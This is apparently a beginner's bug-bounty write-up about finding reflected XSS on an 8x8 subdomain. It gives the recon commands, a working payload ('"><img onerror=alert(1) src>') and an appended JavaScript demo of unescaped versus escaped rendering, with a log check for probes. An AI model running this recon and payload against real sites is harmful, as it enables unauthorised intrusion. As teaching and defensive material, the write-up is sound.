Hi guys. I found an XSS on 8x8 within 3 minutes and I want to share it step by step. I am writing these write-ups for beginners like me. I think I will learn more as I write and I love it.
STEP 1 — Subdomain Enumeration
assetfinder -subs-only 8x8.com | httprobe
Here is our target: client-beta.global.chalet.8x8.com
STEP 2 — Directory discovery
dirsearch.py -u "client-beta.global.chalet.8x8.com" -e html,json
STEP 3 — Hidden parameters are gold
🔥 :bad_params!! Let’s use arjun to find hidden parameters.
Now we have a GET parameter reflected on the blank page. 👌 Let's try to get XSS!!
Payload: "><img onerror=alert(1) src>
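To show why that payload works and how the fix looks, here is an added example (my own code, not from the original post or from 8x8) that models a GET parameter echoed into an HTML attribute, once unencoded and once HTML-entity encoded, plus a small check a defender can run over request logs. The template and the sample request are assumptions constructed for the demo.

```javascript
// Added example, not code from the original post or from 8x8: it models the
// reflection the write-up describes. A GET parameter is echoed into an HTML
// attribute; without encoding, the page's payload closes the attribute and
// injects an <img> with an onerror handler, with encoding it stays inert.

const PAYLOAD = '"><img onerror=alert(1) src>'; // payload from the write-up

// Vulnerable rendering: parameter value concatenated straight into an attribute.
function renderVulnerable(value) {
  return `<input type="text" name="q" value="${value}">`;
}

// Mitigation: HTML-entity encode the value before placing it in the attribute.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}
function renderSafe(value) {
  return `<input type="text" name="q" value="${escapeHtml(value)}">`;
}

// The template contains exactly one tag, so a second tag in the output means
// the reflected value broke out of the attribute.
function countTags(html) {
  return (html.match(/<[a-z]/gi) || []).length;
}

// Defender-side triage of a request log: URL-decode the query value and flag
// tag or event-handler syntax, which is the shape the payload above has.
function looksLikeXssProbe(rawValue) {
  let v;
  try { v = decodeURIComponent(rawValue); } catch (e) { v = rawValue; }
  return /<[a-z]/i.test(v) || /\bon[a-z]+\s*=/i.test(v);
}

// Constructed sample query value (hypothetical, not a real log entry).
const SAMPLE_QUERY = '%22%3E%3Cimg%20onerror%3Dalert(1)%20src%3E';

console.log(renderVulnerable(PAYLOAD)); // two tags: breakout succeeded
console.log(renderSafe(PAYLOAD));       // one tag: payload rendered as text
console.log(looksLikeXssProbe(SAMPLE_QUERY)); // true
```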
Thank you !!!